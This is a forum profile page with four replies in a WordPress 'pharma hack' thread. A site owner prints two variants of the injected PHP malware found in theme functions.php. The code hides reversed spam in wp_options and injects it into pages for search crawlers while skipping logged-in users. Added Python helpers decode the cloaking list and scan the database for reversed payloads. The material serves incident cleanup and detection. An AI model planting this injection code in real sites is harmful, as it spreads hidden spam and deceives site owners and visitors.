Grady Booch

Forum Replies Created

Viewing 4 posts - 1 through 4 (of 4 total)
    in reply to: Weird pharma hack #788

    Grady Booch
    Member

    Last thing before I’m off to bed, for those of you chasing down this same problem: the combination of Eli’s wonderful anti-malware plug-in plus the use of the Exploit Scanner plugin is what I’ve used to stamp out this hack.

    Happy hunting…

    in reply to: Weird pharma hack #787

    Grady Booch
    Member

    Thanks, Eli!

    BTW, my second site was hacked in a similar albeit subtly different way. In this case, the offending wp_options name/value pair is stored in a different place (it’s named _property1) and the code that’s generated and injected just after a page’s body is this:

    if (!function_exists("b_call")) {
        function b_call() {
            if (!ob_get_level()) ob_start("b_goes");
        }
        function b_goes($p) {
            if (!defined('wp_m1')) {
                $f1 = explode('|', '3639549952,8191.1123631104,8191.1089052672,8191.1078218752,2047.1078220802,1229.1087381508,1444.3512041472,4095.1113980928,4095.1208926208,16383.1249705984,65535|via translate.google.com,Google WAP Proxy,Google CHTML Proxy|tumblrbot');
                $f3=0;
                $f2=ip2long($_SERVER["REMOTE_ADDR"]);
                foreach(explode('.', array_shift($f1)) as $line) {
                    list($a1,$a2)=explode(',',$line);
                    if ($f2>=$a1&&$f2<=($a1+$a2)) {
                        $f3=1;
                        break;
                    }
                }
                foreach(array_reverse($f1,1) as $k=>$v) {
                    foreach(explode(',', $v) as $line) {
                        if (stripos($_SERVER["HTTP_USER_AGENT"], $line) !== false) {
                            $f3=$k;
                            break;
                        }
                    }
                }
                if (!$f3 || isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_property1'))) {
                    return $p;
                }
                list($m, $n) = @unserialize(trim(strrev($m)));
                define('wp_m1', $m);
                define('wp_n1', $n);
            }
            if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
            if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
            if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
            if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
            return $p;
        }
        function b_end() {
            @ob_end_flush();
        }
        if (ob_get_level()) ob_end_clean();
        add_action("init", "b_call");
        add_action("wp_head", "b_call");
        add_action("get_sidebar", "b_call");
        add_action("wp_footer", "b_call");
        add_action("shutdown", "b_end");
    }

    but it has the same effect (the value of the spam was the same for both sites, although the code was different, as above, and the name of the wp_option item was different).
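The visitor-selection list in the second variant above is compact but readable once decoded. The following is an added example for defenders, not code from the post or from either plugin: it parses that list, turns the "start,count" pairs into dotted IPv4 ranges (the decoded blocks correspond to Google crawler address space, which is why a site owner browsing normally never sees the spam), and mirrors the sample's decision logic so you can reason about which visitors would have been served the injected content. The sample visitor addresses and user agents in the usage section are constructed.

```python
import ipaddress

# The '|'-separated cloaking list from the b_goes() sample above. Field 0 holds
# "start,count" IPv4 ranges joined by '.', the remaining fields hold comma-separated
# user-agent substrings.
CLOAK_LIST = (
    "3639549952,8191.1123631104,8191.1089052672,8191.1078218752,2047."
    "1078220802,1229.1087381508,1444.3512041472,4095.1113980928,4095."
    "1208926208,16383.1249705984,65535"
    "|via translate.google.com,Google WAP Proxy,Google CHTML Proxy|tumblrbot"
)


def parse_cloak_list(raw):
    """Return ([(first_ip, last_ip), ...], [[ua substrings], ...])."""
    fields = raw.split("|")
    ranges = []
    for item in fields[0].split("."):
        start, count = (int(x) for x in item.split(","))
        ranges.append((ipaddress.IPv4Address(start), ipaddress.IPv4Address(start + count)))
    ua_lists = [field.split(",") for field in fields[1:]]
    return ranges, ua_lists


def describe_ranges(ranges):
    """Dotted-quad form of each range, e.g. '216.239.32.0-216.239.63.255'."""
    return [f"{lo}-{hi}" for lo, hi in ranges]


def spam_would_be_injected(remote_addr, user_agent, ranges, ua_lists, logged_in=False):
    """Mirror the sample's decision: True when this visitor would be served the
    injected content, False when they would see the clean page."""
    if logged_in:                      # the cookie / is_user_logged_in() checks
        return False
    addr = ipaddress.IPv4Address(remote_addr)
    f3 = 1 if any(lo <= addr <= hi for lo, hi in ranges) else 0
    # The UA lists are walked in reverse but the value assigned is the list's
    # original index, as in foreach(array_reverse($f1, 1) as $k => $v). Only the
    # inner loop breaks, so index 0 (the Google proxy strings) is checked last and
    # forces 0: a human reading the page through Google Translate gets the clean copy.
    for k in reversed(range(len(ua_lists))):
        for needle in ua_lists[k]:
            if needle.lower() in user_agent.lower():
                f3 = k
                break
    return bool(f3)


if __name__ == "__main__":
    ranges, ua_lists = parse_cloak_list(CLOAK_LIST)
    print("cloaked IP ranges:", *describe_ranges(ranges), sep="\n  ")
    print("crawler UA markers:", ua_lists[1], "| hidden-from UA markers:", ua_lists[0])
    # Constructed visitors: a crawler from the first range, and an ordinary browser.
    print(spam_would_be_injected("216.239.40.5", "Googlebot/2.1", ranges, ua_lists))
    print(spam_would_be_injected("198.51.100.7", "Mozilla/5.0 Firefox", ranges, ua_lists))
```

The practical lesson for cleanup is that an admin session, a logged-in cookie, or a normal home IP will never trigger the injection, so "I can't reproduce it" is not evidence the site is clean; look at the database and the output-buffer hooks instead.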

    in reply to: Weird pharma hack #784

    Grady Booch
    Member

    Further update on the cleansing of my site….

    I’ve purged what appear to be all the bogus/changed core files that may have been the cause of the hack, although I’m not completely confident….I need to look through all my plugins. But, most important, I found that this hack is using an entry in the table wp_options to hold a key/value pair, containing the spam message (in reverse, which is a signature of the pharma hack). Specifically, check out the record whose name is _textalternate2 and you’ll see the offending code.

    So, it’s a start…
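Because the option name changed between the two infected sites (_textalternate2 here, _property1 on the second site), searching wp_options by name is unreliable; the stable signature is the storage trick itself: a PHP-serialized array stored reversed, which both code samples undo with unserialize(trim(strrev($m))). The following is an added example, not code from the post or from either plugin: it scans a constructed option_name/option_value dump, skips values that are already forward-serialized (ordinary WordPress data), and reports any value that only becomes a serialized array after reversal. The php_serialize_string_list helper and the placeholder payload strings are constructed for the sample; a real scan would feed it the rows from `SELECT option_name, option_value FROM wp_options`.

```python
import re

# Forward-serialized values are what WordPress itself writes into wp_options.
SERIALIZED_ARRAY = re.compile(r"^a:\d+:\{")


def php_serialize_string_list(values):
    """Constructed helper used only to build the sample dump below; produces the
    shape PHP's serialize() emits for a plain list of strings."""
    body = "".join(f'i:{i};s:{len(v.encode())}:"{v}";' for i, v in enumerate(values))
    return f"a:{len(values)}:{{{body}}}"


def php_unserialize_string_list(data):
    """Decode a:N:{i:k;s:len:"...";...} into a list of str, or None on any other
    shape. String lengths are byte counts, as in PHP, so the parser works on bytes."""
    buf = data.encode()
    head = re.match(rb"a:(\d+):\{", buf)
    if not head:
        return None
    pos, out = head.end(), []
    for _ in range(int(head.group(1))):
        item = re.match(rb'i:\d+;s:(\d+):"', buf[pos:])
        if not item:
            return None
        length = int(item.group(1))
        start = pos + item.end()
        out.append(buf[start:start + length].decode(errors="replace"))
        pos = start + length
        if buf[pos:pos + 2] != b'";':
            return None
        pos += 2
    return out if buf[pos:] == b"}" else None


def find_reversed_payloads(options):
    """Scan option_name -> option_value pairs and report the ones whose value is
    a serialized PHP array only after strrev(), which is how the posts describe
    the spam being stored. Returns {option_name: [decoded strings]}."""
    hits = {}
    for name, value in options.items():
        if SERIALIZED_ARRAY.match(value):
            continue
        decoded = php_unserialize_string_list(value.strip()[::-1])
        if decoded is not None:
            hits[name] = decoded
    return hits


# Constructed stand-in for a wp_options dump: two ordinary rows plus one row
# storing a reversed payload under the name the post reports. The payload
# strings are placeholders, not real spam.
SAMPLE_OPTIONS = {
    "siteurl": "https://example.com",
    "active_plugins": php_serialize_string_list(["exploit-scanner/exploit-scanner.php"]),
    "_textalternate2": php_serialize_string_list([
        "<!-- constructed: block injected before </head> -->",
        '<div style="display:none">constructed: block injected after <body></div>',
    ])[::-1],
}

if __name__ == "__main__":
    for name, parts in find_reversed_payloads(SAMPLE_OPTIONS).items():
        print(f"{name}: reversed serialized payload with {len(parts)} part(s)")
        for part in parts:
            print("   ", part)
```

The decoder deliberately accepts only the two-string-array shape the samples unpack with list($m, $n); anything more exotic in the database is better inspected by hand than guessed at by a scanner.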

    in reply to: Weird pharma hack #782

    Grady Booch
    Member

    I also am trying to unwind this weird pharma hack, which has infected two of my websites (computingthehumanexperience.com and creationsbyjan.com). In both cases, the hack is infecting the functions.php file of my resident themes.

    Your plug-in did indeed detect the offending code (which looks like this):
    if (!function_exists("b_call")) {
        function b_call() {
            if (!ob_get_level()) ob_start("b_goes");
        }
        function b_goes($p) {
            if (!defined('wp_m1')) {
                if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_textalternate2'))) {
                    return $p;
                }
                list($m, $n) = @unserialize(trim(strrev($m)));
                define('wp_m1', $m);
                define('wp_n1', $n);
            }
            if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
            if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
            if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
            if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
            return $p;
        }
        function b_end() {
            @ob_end_flush();
        }
        if (ob_get_level()) ob_end_clean();
        add_action("init", "b_call");
        add_action("wp_head", "b_call");
        add_action("get_sidebar", "b_call");
        add_action("wp_footer", "b_call");
        add_action("shutdown", "b_end");
    }

    I’m currently throwing all sorts of things at the problem. Exploit Scanner uncovered a handful of core WordPress files that should not be there (and I’ve eliminated those) but clearly there’s still something in the database that makes this injected code pop up at random times like a whack-a-mole game. I’ve checked the usual places in the wp-options table (but no joy yet) and I’m about to look through all my plugins for strange code.

    As for the database investigation, I should point out that all the usual table item names that have been typically used in pharma attacks are not present….this current attack appears to be some new variation.

    Needless to say, this is annoying :-(

    (and thank you, your plugin helped me attend to the immediate symptoms….now I just need to find the root of the disease)
